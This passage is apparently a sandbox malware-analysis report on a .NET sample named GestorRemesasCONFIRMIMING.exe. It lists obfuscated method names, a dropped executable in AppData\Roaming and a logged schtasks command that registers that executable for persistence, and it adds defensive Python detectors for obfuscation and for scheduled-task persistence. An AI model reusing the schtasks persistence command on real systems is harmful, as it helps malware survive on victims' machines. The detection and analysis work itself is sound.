Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, O8Kju4WdatacJtMlao.cs | High entropy of concatenated method names: 'lwwRABcoHe', 'ksWR7oI3tf', 'WqKBaXwIyE', 'aeGB5u5ORu', 'EFhRt7b6UL', 'EEtRJyE33F', 'zmcRKWV2uk', 'Oe5RPAXlIP', 'xNSRksmxdJ', 'LmCRI7xEY0'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, NQnrfhcriRyJ7DvK1o.cs | High entropy of concatenated method names: 'Dispose', 'ABo5hGXJcQ', 'btNpMSoGUo', 'xFsbb1GNsk', 'A7h57XSrqJ', 'r285zjLnWk', 'ProcessDialogKey', 'FHUpa1ID0V', 'BNGp5TOnmn', 'lcappfZlr3'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, zH39l8IGsmijULtLhe.cs | High entropy of concatenated method names: 'ToString', 'LS6jtCiGwp', 'RZ8jMxtfR2', 'chpjSybyur', 'P3sjyvlq17', 'kgUjivKiS8', 'VVLjZVk2Tu', 'a1Qj9PJDFe', 'd7Gjm3sSeY', 'tICjlYT7EL'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, mZlr3Q70sPyqcdFmuV.cs | High entropy of concatenated method names: 'NPp25fyoWd', 'lLT2Vyw4gc', 'FNj2Os6JR6', 'SGV2gqKS5N', 'h6H2c7ZlyU', 'fMw2eOvUbI', 'cug2dwu1y9', 'VwjB85D9YX', 'iQIBAOLvsy', 'XPiBhVsTOU'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, XS1NE3retZlaifF1ni.cs | High entropy of concatenated method names: 'srVR1oIvRa', 'piFRfqYb5H', 'ToString', 'iHGRgQWjSf', 'zgJRcLxZWC', 'uMuRXqKhK2', 'yGKRee0jJo', 'kx8RdQXLf7', 'B4bRUCs1bl', 'E0RRxBmvp8'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, A9QjLMYwTjItUACC7F.cs | High entropy of concatenated method names: 'wJGdNdYCLD', 'CmddcBiY0P', 'olIdeQNH1W', 'MwAdUnLHCq', 'UhTdx85iAj', 'VZye0MI0at', 'z6KeW3rscM', 'ykve8HRDao', 'jGYeArk7rY', 'vclehYVpJ3'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, Kk2NMrOZGpdTfsfT7e.cs | High entropy of concatenated method names: 'OCF5U31OK3', 'IYL5xts9Kn', 'tQJ51pdQAt', 'kq95fG72Li', 'wMR56qlQ9Q', 'pLM5jwTjIt', 'wTEuUOva98X8VabJYj', 'XBta0PwnS1Uiw1lVtZ', 'temnn3NK2SyOuM6Q0d', 'MW655HbMvr'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, MqqPW7K7lpQUUAPgEw.cs | High entropy of concatenated method names: 'sq0TDmrOIQ', 'zhHTGatRAo', 'U39TYB7Q1k', 'q3bTMmR43t', 'EFJTynAip7', 'A6bTiPI4Rx', 'N04T9wScOh', 'ICkTm7Lv0Q', 'L0cTve9P03', 'RlvTtROPOT'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, b2uxQNlJT12B9qrnb4.cs | High entropy of concatenated method names: 'vAuUoqUrdo', 'pA8UwV80SC', 'HgOU4UcNKc', 'OZSUQGJvCR', 'OwFUu46GJI', 'rXKUFo92CE', 'cxTUHfo5yw', 'fCWUDQIeeF', 'fj1UGDL9QP', 'w5GUCERgW3'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, j1ID0VhuNGTOnmnnca.cs | High entropy of concatenated method names: 'ihYBY4OFVX', 'dbGBMUEnuj', 'lAIBS66N4F', 'HSIByOGwwu', 'gghBPIJdfH', 'ymIBi8vytC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, YerQAbGQJpdQAtxq9G.cs | High entropy of concatenated method names: 'IXJXQfQbTK', 'MPdXFNL8fx', 'zbHXDslvSP', 'CSuXGlVIlt', 'Y4ZX6BASHc', 'WsJXjLN1FG', 'RADXRqTif0', 'uD1XBUwbpm', 'LBnX2gCayx', 'ioWXqqpTfA'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, C31OK3DSYLts9Kn2AE.cs | High entropy of concatenated method names: 'vgocPKMEbO', 'ILfckZkvI5', 'hIAcItdYDW', 'CElcrt1ROd', 'Jjbc0AIUCP', 'vwLcWfBaS5', 'Ejgc8jbG4M', 'IBZcA2NClH', 'kBJchDXluq', 'l6qc7GsCR5'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, YhXSrqAJ228jLnWkCH.cs | High entropy of concatenated method names: 'EYFBg3H5xa', 'KomBchLlDM', 'nx1BXSIn6X', 'iA3BeBF32y', 'tyRBdhTBtt', 'wOlBUgeEq6', 'J04BxjSPfI', 'dnCBn1f16A', 'jD0B1XSlrB', 'T27BfZNAqd'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, qrI5eWPSKF9OqclJGk.cs | High entropy of concatenated method names: 'vDY6vU173V', 'rrx6JCmcle', 'Vn76PTGheS', 'Yof6kinPxx', 'zDq6MJUF8Z', 'Dnd6SdUIUK', 'opm6yT6sCn', 'BGt6iSMMS5', 'cvb6Zx2hcT', 'NZv692NEpA'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, e3Cguqpfxu89Mvv15T.cs | High entropy of concatenated method names: 'Q8Z4dUR6w', 'pJJQMpUln', 'cQtFFHqFh', 'IErHIy90E', 'zr2Gs8E5a', 'qBWCVum5Y', 'fpJ22tCU4TnvIG8pkM', 'eQfMgKofRPlEd9GQBZ', 'PddBuTQbo', 'mHqqM0QMh'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, MSjeT55arsm4NWwVWSs.cs | High entropy of concatenated method names: 'wjY2o23fOX', 'VEd2wUv2vQ', 'ddV24SNkOF', 'GjM2QuwDlA', 'aFQ2uM6VUY', 'kiJ2FNxtXL', 'Uhs2HEDwCk', 'Dwj2Dbeh2j', 'NKo2GVBZWK', 'jni2Cshyd9'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, DLW6uZz8LDw2tvCHRG.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cTK2TJRbsr', 'gpU26RrGdw', 'XJF2jWfdfr', 'x1S2RWIiDP', 'awY2BgaIs3', 'ruv22USwAl', 'hl22qaJvnF'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | High entropy of concatenated method names: 'fBQVNC1g7g', 'tFsVg1XxJU', 'DLfVco5gar', 'bXpVXmRS3t', 'C1LVe8lgsP', 'tjqVdGHPME', 'RcNVUSamUA', 'yQTVxGWttR', 'lToVnuEkKa', 'ioMV17DOHG'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, Ve41iQ9PJaAIEEUZNC.cs | High entropy of concatenated method names: 'dJ2UgJPlKU', 'fdRUXip73P', 'AS3UdtUsfh', 'Bbxd7HHZqP', 'wqOdzum1jI', 'ouYUaLLy14', 'ngoU5MJyqO', 'xqyUproAuM', 'VGvUVOOlxT', 'FpeUOJVh0W'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, GIgbxK5VWMd1fni7NmR.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsIqP0MWJw', 'XOnqkDmd5Z', 'saIqI02eYx', 'vXcqrjWa4D', 'c9iq04oAOh', 'DEgqWJ6DEs', 'vIjq8IcBKv'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, O8Kju4WdatacJtMlao.cs | High entropy of concatenated method names: 'lwwRABcoHe', 'ksWR7oI3tf', 'WqKBaXwIyE', 'aeGB5u5ORu', 'EFhRt7b6UL', 'EEtRJyE33F', 'zmcRKWV2uk', 'Oe5RPAXlIP', 'xNSRksmxdJ', 'LmCRI7xEY0'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, NQnrfhcriRyJ7DvK1o.cs | High entropy of concatenated method names: 'Dispose', 'ABo5hGXJcQ', 'btNpMSoGUo', 'xFsbb1GNsk', 'A7h57XSrqJ', 'r285zjLnWk', 'ProcessDialogKey', 'FHUpa1ID0V', 'BNGp5TOnmn', 'lcappfZlr3'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, zH39l8IGsmijULtLhe.cs | High entropy of concatenated method names: 'ToString', 'LS6jtCiGwp', 'RZ8jMxtfR2', 'chpjSybyur', 'P3sjyvlq17', 'kgUjivKiS8', 'VVLjZVk2Tu', 'a1Qj9PJDFe', 'd7Gjm3sSeY', 'tICjlYT7EL'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, mZlr3Q70sPyqcdFmuV.cs | High entropy of concatenated method names: 'NPp25fyoWd', 'lLT2Vyw4gc', 'FNj2Os6JR6', 'SGV2gqKS5N', 'h6H2c7ZlyU', 'fMw2eOvUbI', 'cug2dwu1y9', 'VwjB85D9YX', 'iQIBAOLvsy', 'XPiBhVsTOU'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, XS1NE3retZlaifF1ni.cs | High entropy of concatenated method names: 'srVR1oIvRa', 'piFRfqYb5H', 'ToString', 'iHGRgQWjSf', 'zgJRcLxZWC', 'uMuRXqKhK2', 'yGKRee0jJo', 'kx8RdQXLf7', 'B4bRUCs1bl', 'E0RRxBmvp8'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, A9QjLMYwTjItUACC7F.cs | High entropy of concatenated method names: 'wJGdNdYCLD', 'CmddcBiY0P', 'olIdeQNH1W', 'MwAdUnLHCq', 'UhTdx85iAj', 'VZye0MI0at', 'z6KeW3rscM', 'ykve8HRDao', 'jGYeArk7rY', 'vclehYVpJ3'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, Kk2NMrOZGpdTfsfT7e.cs | High entropy of concatenated method names: 'OCF5U31OK3', 'IYL5xts9Kn', 'tQJ51pdQAt', 'kq95fG72Li', 'wMR56qlQ9Q', 'pLM5jwTjIt', 'wTEuUOva98X8VabJYj', 'XBta0PwnS1Uiw1lVtZ', 'temnn3NK2SyOuM6Q0d', 'MW655HbMvr'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, MqqPW7K7lpQUUAPgEw.cs | High entropy of concatenated method names: 'sq0TDmrOIQ', 'zhHTGatRAo', 'U39TYB7Q1k', 'q3bTMmR43t', 'EFJTynAip7', 'A6bTiPI4Rx', 'N04T9wScOh', 'ICkTm7Lv0Q', 'L0cTve9P03', 'RlvTtROPOT'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, b2uxQNlJT12B9qrnb4.cs | High entropy of concatenated method names: 'vAuUoqUrdo', 'pA8UwV80SC', 'HgOU4UcNKc', 'OZSUQGJvCR', 'OwFUu46GJI', 'rXKUFo92CE', 'cxTUHfo5yw', 'fCWUDQIeeF', 'fj1UGDL9QP', 'w5GUCERgW3'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, j1ID0VhuNGTOnmnnca.cs | High entropy of concatenated method names: 'ihYBY4OFVX', 'dbGBMUEnuj', 'lAIBS66N4F', 'HSIByOGwwu', 'gghBPIJdfH', 'ymIBi8vytC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, YerQAbGQJpdQAtxq9G.cs | High entropy of concatenated method names: 'IXJXQfQbTK', 'MPdXFNL8fx', 'zbHXDslvSP', 'CSuXGlVIlt', 'Y4ZX6BASHc', 'WsJXjLN1FG', 'RADXRqTif0', 'uD1XBUwbpm', 'LBnX2gCayx', 'ioWXqqpTfA'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, C31OK3DSYLts9Kn2AE.cs | High entropy of concatenated method names: 'vgocPKMEbO', 'ILfckZkvI5', 'hIAcItdYDW', 'CElcrt1ROd', 'Jjbc0AIUCP', 'vwLcWfBaS5', 'Ejgc8jbG4M', 'IBZcA2NClH', 'kBJchDXluq', 'l6qc7GsCR5'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, YhXSrqAJ228jLnWkCH.cs | High entropy of concatenated method names: 'EYFBg3H5xa', 'KomBchLlDM', 'nx1BXSIn6X', 'iA3BeBF32y', 'tyRBdhTBtt', 'wOlBUgeEq6', 'J04BxjSPfI', 'dnCBn1f16A', 'jD0B1XSlrB', 'T27BfZNAqd'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, qrI5eWPSKF9OqclJGk.cs | High entropy of concatenated method names: 'vDY6vU173V', 'rrx6JCmcle', 'Vn76PTGheS', 'Yof6kinPxx', 'zDq6MJUF8Z', 'Dnd6SdUIUK', 'opm6yT6sCn', 'BGt6iSMMS5', 'cvb6Zx2hcT', 'NZv692NEpA'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, e3Cguqpfxu89Mvv15T.cs | High entropy of concatenated method names: 'Q8Z4dUR6w', 'pJJQMpUln', 'cQtFFHqFh', 'IErHIy90E', 'zr2Gs8E5a', 'qBWCVum5Y', 'fpJ22tCU4TnvIG8pkM', 'eQfMgKofRPlEd9GQBZ', 'PddBuTQbo', 'mHqqM0QMh'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, MSjeT55arsm4NWwVWSs.cs | High entropy of concatenated method names: 'wjY2o23fOX', 'VEd2wUv2vQ', 'ddV24SNkOF', 'GjM2QuwDlA', 'aFQ2uM6VUY', 'kiJ2FNxtXL', 'Uhs2HEDwCk', 'Dwj2Dbeh2j', 'NKo2GVBZWK', 'jni2Cshyd9'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, DLW6uZz8LDw2tvCHRG.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cTK2TJRbsr', 'gpU26RrGdw', 'XJF2jWfdfr', 'x1S2RWIiDP', 'awY2BgaIs3', 'ruv22USwAl', 'hl22qaJvnF'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | High entropy of concatenated method names: 'fBQVNC1g7g', 'tFsVg1XxJU', 'DLfVco5gar', 'bXpVXmRS3t', 'C1LVe8lgsP', 'tjqVdGHPME', 'RcNVUSamUA', 'yQTVxGWttR', 'lToVnuEkKa', 'ioMV17DOHG'
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
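The "High entropy of concatenated method names" rows above are a heuristic for name-obfuscated .NET assemblies: an obfuscator replaces readable identifiers with random alphanumeric strings, so the character distribution of a class's method names approaches uniform, while ordinary camel/Pascal-case identifiers reuse a small set of letters. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own implementation of the signature: it computes Shannon entropy over the concatenated method names of each class and flags classes above a threshold. The 4.8-bit threshold and the benign comparison class (DatabaseSession.cs) are assumptions chosen for illustration; the obfuscated input is the method-name list reported above for C31OK3DSYLts9Kn2AE.cs.

```python
import math
from collections import Counter
from typing import Dict, Iterable, List


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the character distribution of text, in bits per character.

    A string drawn uniformly from N symbols approaches log2(N) bits; English-like
    identifiers reuse a handful of letters and score well below that.
    """
    if not text:
        return 0.0
    n = len(text)
    counts = Counter(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def method_name_entropy(names: Iterable[str]) -> float:
    """Entropy of one class's method names concatenated into a single string,
    which is what the sandbox signature measures."""
    return shannon_entropy("".join(names))


# Assumed threshold for this example (not the sandbox's value). Identifier-like
# names typically land around 4.0-4.5 bits; ten random 10-character
# alphanumeric names land around 5.3 bits.
ENTROPY_THRESHOLD = 4.8


def flag_obfuscated_classes(classes: Dict[str, List[str]]) -> Dict[str, float]:
    """Return {class_name: entropy} for classes whose concatenated method names
    exceed ENTROPY_THRESHOLD."""
    flagged = {}
    for cls, names in classes.items():
        h = method_name_entropy(names)
        if h > ENTROPY_THRESHOLD:
            flagged[cls] = round(h, 3)
    return flagged


# Method names exactly as reported above for one class of the unpacked payload.
OBFUSCATED_CLASS = {
    "C31OK3DSYLts9Kn2AE.cs": [
        "vgocPKMEbO", "ILfckZkvI5", "hIAcItdYDW", "CElcrt1ROd", "Jjbc0AIUCP",
        "vwLcWfBaS5", "Ejgc8jbG4M", "IBZcA2NClH", "kBJchDXluq", "l6qc7GsCR5",
    ],
}

# Constructed benign comparison class (not from the sample): ordinary .NET naming.
BENIGN_CLASS = {
    "DatabaseSession.cs": [
        "GetConnectionString", "OpenConnection", "CloseConnection", "ExecuteQuery",
        "ExecuteNonQuery", "BeginTransaction", "CommitTransaction",
        "RollbackTransaction", "Dispose", "ToString",
    ],
}


if __name__ == "__main__":
    sample = {**OBFUSCATED_CLASS, **BENIGN_CLASS}
    for cls, names in sample.items():
        print(f"{cls:24s} {method_name_entropy(names):.3f} bits")
    print("flagged:", flag_obfuscated_classes(sample))
```

Entropy is a per-class signal, not a verdict: DLW6uZz8LDw2tvCHRG.cs above keeps three real TypeConverter method names (CanConvertFrom, ConvertFrom, ConvertTo) next to seven random ones, because overrides of framework methods cannot be renamed, so a class-level score should be read together with the share of names that look like framework overrides.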

                    Boot Survival

                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"
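The schtasks command line above registers a task from an XML definition that was written to %TEMP% (the Sigma match "Scheduled temp file as task from temp location" in the overview). The report does not show the contents of tmpCF9B.tmp. The Python below is an added example, not part of the report and not code from the sample: it matches that command-line pattern in a process-creation event and parses a Task Scheduler XML definition to list its triggers and any Exec action whose command lives in a user-writable directory. The task XML embedded in it is constructed for the example, modelled on the dropped-file path reported above (C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe); the list of user-writable directory markers is an assumption.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

# Namespace of the Task Scheduler XML schema that `schtasks /Create /XML` consumes.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumed markers for user-writable directories (paths are normalised to forward
# slashes and lower case before matching). A task action rooted here was most
# likely registered by code running as the user, not by an installer.
USER_WRITABLE_MARKERS = ("/appdata/roaming/", "/appdata/local/temp/", "/users/public/")

# schtasks ... /Create ... /XML <path>, with the path either quoted or bare.
SCHTASKS_XML_RE = re.compile(
    r'schtasks(?:\.exe)?"?\s+.*?/create\b.*?/xml\s+(?:"(?P<quoted>[^"]+)"|(?P<bare>\S+))',
    re.IGNORECASE,
)


def _normalise(path: str) -> str:
    return path.strip().strip('"').replace("\\", "/").lower()


def schtasks_xml_from_temp(cmdline: str) -> Optional[str]:
    """If cmdline is a `schtasks /Create` that loads its task definition from a
    file under a Temp directory, return that file's path; otherwise None."""
    m = SCHTASKS_XML_RE.search(cmdline)
    if not m:
        return None
    path = m.group("quoted") or m.group("bare")
    return path if "/temp/" in _normalise(path) else None


def task_triggers(task_xml: str) -> List[str]:
    """Names of the trigger elements (LogonTrigger, CalendarTrigger, ...) in a task definition."""
    root = ET.fromstring(task_xml)
    triggers = root.find("t:Triggers", TASK_NS)
    if triggers is None:
        return []
    return [child.tag.rsplit("}", 1)[-1] for child in triggers]


def suspicious_exec_commands(task_xml: str) -> List[str]:
    """Exec action commands in the task definition that point into user-writable directories."""
    root = ET.fromstring(task_xml)
    hits = []
    for cmd in root.iterfind(".//t:Actions/t:Exec/t:Command", TASK_NS):
        raw = (cmd.text or "").strip()
        if any(marker in _normalise(raw) for marker in USER_WRITABLE_MARKERS):
            hits.append(raw)
    return hits


def assess(cmdline: str, task_xml: str) -> dict:
    """Combine both signals for one schtasks process-creation event and the XML it referenced."""
    xml_path = schtasks_xml_from_temp(cmdline)
    exec_hits = suspicious_exec_commands(task_xml)
    return {
        "xml_from_temp": xml_path,
        "triggers": task_triggers(task_xml),
        "user_writable_actions": exec_hits,
        "suspicious": xml_path is not None and bool(exec_hits),
    }


# Command line as reported in the row above.
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" '
    r'/XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"'
)

# Constructed task definition for this example (the report does not show the
# real tmpCF9B.tmp); the action path is the dropped file reported above.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe</Command>
    </Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    print(assess(SAMPLE_CMDLINE, SAMPLE_TASK_XML))
```

On a live host the same parsing applies to the task definitions stored under C:\Windows\System32\Tasks (one XML file per task), so the XML checks can run over existing tasks even when the temporary file passed to /XML has already been deleted, as it usually is.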

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Process information set: NOOPENFILEERRORBOX (44 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
